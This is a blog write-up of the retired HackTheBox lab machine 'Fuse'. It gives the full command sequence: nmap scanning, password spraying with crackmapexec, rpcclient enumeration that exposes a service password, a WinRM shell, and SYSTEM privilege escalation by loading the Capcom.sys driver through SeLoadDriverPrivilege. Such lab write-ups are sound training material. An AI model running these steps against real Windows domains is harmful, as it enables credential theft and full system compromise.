Hackthebox - Fuse

Summary

Fuse is a Windows, medium box is a created by egre55. Initial foothold was exploiting a corporation automatic printer install process and finding an expire credential for an user,after resetting the password we can do rpc Enumeration which give us credential for the printer service using which we can get a shell on the box. Checking Printer service permission we see it can load drivers so we create a malicious driver to get privilege escalation on the box.

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# Nmap 7.80 scan initiated Sun Aug 30 08:55:56 2020 as: nmap -sC -sV -oN nmap/fuse 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.078s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-30 03:39:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/30%Time=5F4B1C55%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m02s, deviation: 4h02m29s, median: 13m02s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-08-29T20:41:29-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-30T03:41:32
|_ start_date: 2020-08-29T14:55:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 30 09:01:06 2020 -- 1 IP address (1 host up) scanned in 309.93 seconds

Web (Port: 80)

Visiting the site on http://10.10.10.193 redirect us to http://fuse.fabricorp.local/

Enumerating the web page we find some usernames

1
2
3
4
5
pmerton
tlavel
sthompson
bhult
administrator

As we have usernames lets cewl for passwords maybe.
using

1
cewl -d 5 -m 3 -w wordlist-withNumbers http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

SMB

Password Spraying on smb using crackmapexec we get for tlavel we have a hit with a message to change the password with password as Fabricorp01

So lets use smbpasswd to change the password

1
2
3
4
5
smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

getting a rpcclient and enumerating we can get all the users using enumdomusers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

and checking enumprinters we get a new password $fab@s3Rv1ce$1

This was the part I hate the most about this box as password keep reseting back.

Lets password spray again and see if we find any valid login with this password.

Shell (svc-print)

1
2
3
4
5
6
7
8
crackmapexec winrm 10.10.10.193 -u loot/users.list  -p '$fab@s3Rv1ce$1'
WINRM 10.10.10.193 5985 FUSE [*] http://10.10.10.193:5985/wsman
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user administrator with ntlm"
WINRM 10.10.10.193 5985 FUSE [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)

give us a cred to be used on winrm to get a shell

Privilege Escalation

checking whoami /all to see any intresting group

1
2
3
4
5
6
7
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Googling about Abusing any of the Privilege we find we can Abuse SeLoadDriverPrivilege

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

After lot of Google-fu
I got Capcom.sys and ExploitCapcom

I did that because i didn’t wanted to compile it locally.

uploading those files

And running these command to load and exploit

1
2
.\ExploitCapcom.exe LOAD C:\Windows\System32\spool\drivers\color\Capcom.sys
.\ExploitCapcom.exe EXPLOIT whoami

We see we can execute command as nt authority\system

I uploaded an metasploit shell and executed it with

1
.\ExploitCapcom.exe EXPLOIT shell.exe

to get a shell

and we can read root.txt

and we have pwned Fuse 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/fuse/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.